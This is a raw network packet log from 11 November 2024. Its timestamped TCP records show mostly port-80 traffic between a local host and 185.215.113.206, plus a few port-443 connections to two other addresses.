Nov 11, 2024 10:33:25.577374935 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577394009 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.577395916 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577414989 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577419996 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.577426910 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577438116 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.577439070 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577449083 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.577451944 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577465057 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577471972 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.577476025 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577490091 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577498913 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.577510118 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577533007 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.577539921 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.577541113 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577558994 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577568054 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.577570915 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577584028 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577585936 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.577610970 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.577610970 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577625036 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577636003 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577653885 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.577653885 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.577662945 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577675104 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577681065 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.577686071 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577699900 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577721119 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.577735901 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.577785015 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577791929 CET	49848	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:25.577802896 CET	443	49848	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:25.577835083 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577847004 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577857971 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577862024 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.577874899 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577886105 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577894926 CET	49848	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:25.577896118 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577909946 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.577912092 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.577930927 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.577939987 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.577944040 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.577963114 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577971935 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.577975035 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577979088 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.577984095 CET	49831	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:25.577986002 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.577986956 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.578012943 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.578025103 CET	49831	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:25.578025103 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.578057051 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.578075886 CET	49831	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:25.578083992 CET	49831	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:25.578083992 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.578094959 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578105927 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578110933 CET	49831	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:25.578118086 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578130007 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578140974 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.578140974 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578154087 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578155041 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.578181028 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578197956 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578208923 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578211069 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.578239918 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.578253031 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.578286886 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578309059 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578325033 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578342915 CET	49849	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:25.578346968 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578353882 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.578357935 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578365088 CET	443	49849	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:25.578371048 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578377008 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.578382969 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578394890 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578399897 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.578416109 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578433990 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578443050 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.578444004 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578457117 CET	49849	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:25.578458071 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578468084 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578469992 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.578480005 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578483105 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.578490973 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578515053 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.578520060 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578531027 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578540087 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.578541994 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578555107 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578564882 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578568935 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.578577995 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578589916 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578593969 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.578600883 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578608990 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.578613997 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578624964 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578635931 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578644991 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.578645945 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.578668118 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.578689098 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.578936100 CET	49849	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:25.578943014 CET	443	49849	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:25.579210997 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.579220057 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.579242945 CET	49848	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:25.579250097 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.579255104 CET	443	49848	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:25.579269886 CET	49831	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:25.579282045 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.579319954 CET	49831	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:25.579670906 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.579683065 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.579694033 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.579705000 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.579713106 CET	49831	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:25.579713106 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.579716921 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.579730988 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.579739094 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.579742908 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.579754114 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.579758883 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.579767942 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.579780102 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.579791069 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.579792023 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.579803944 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.579818964 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.579833031 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.579870939 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.580389023 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580461979 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.580465078 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580548048 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.580585957 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580598116 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580610037 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580621958 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580634117 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580640078 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580651045 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580651999 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.580677032 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.580720901 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.580734015 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580744982 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580755949 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580760956 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580773115 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580784082 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580792904 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580796003 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.580806017 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580817938 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580826998 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.580828905 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580840111 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580853939 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580866098 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.580866098 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.580883026 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580892086 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.580893993 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580918074 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580920935 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.580929995 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580940962 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580955982 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.580962896 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.580965042 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580976963 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580986977 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.580986977 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581001997 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581012964 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581016064 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581024885 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581036091 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581044912 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581047058 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581056118 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581065893 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581074953 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581091881 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581110001 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581110954 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581121922 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581127882 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581146955 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581157923 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581163883 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581176996 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581185102 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581198931 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581212044 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581216097 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581233025 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581240892 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581250906 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581264019 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581271887 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581283092 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581283092 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581300974 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581314087 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581319094 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581330061 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581337929 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581341028 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581351995 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581362009 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581367970 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581373930 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581394911 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581399918 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581415892 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581434011 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581439972 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581439972 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581454992 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581454992 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581459999 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581471920 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581478119 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581481934 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581501007 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581501961 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581520081 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581531048 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581531048 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581558943 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581584930 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581784964 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581796885 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581806898 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581855059 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.581943035 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581959963 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581971884 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.581983089 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582007885 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582010031 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582020044 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582031012 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582040071 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582045078 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582048893 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582058907 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582081079 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582087040 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582098961 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582098961 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582112074 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582123041 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582123995 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582134962 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582146883 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582153082 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582159996 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582170963 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582184076 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582200050 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582200050 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582228899 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582230091 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582241058 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582252026 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582263947 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582267046 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582276106 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582298040 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582305908 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582320929 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582324028 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582335949 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582341909 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582348108 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582360029 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582370043 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582370043 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582387924 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582401991 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582406044 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582410097 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582418919 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582443953 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582447052 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582459927 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582468033 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582472086 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582484961 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582494974 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582499981 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582506895 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582520008 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582525969 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582532883 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582541943 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582545042 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582560062 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582568884 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582588911 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582592964 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582604885 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582613945 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582616091 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582628012 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582638979 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582653999 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582665920 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582672119 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582679987 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582690001 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582731962 CET	49747	80	192.168.2.5	185.215.113.206
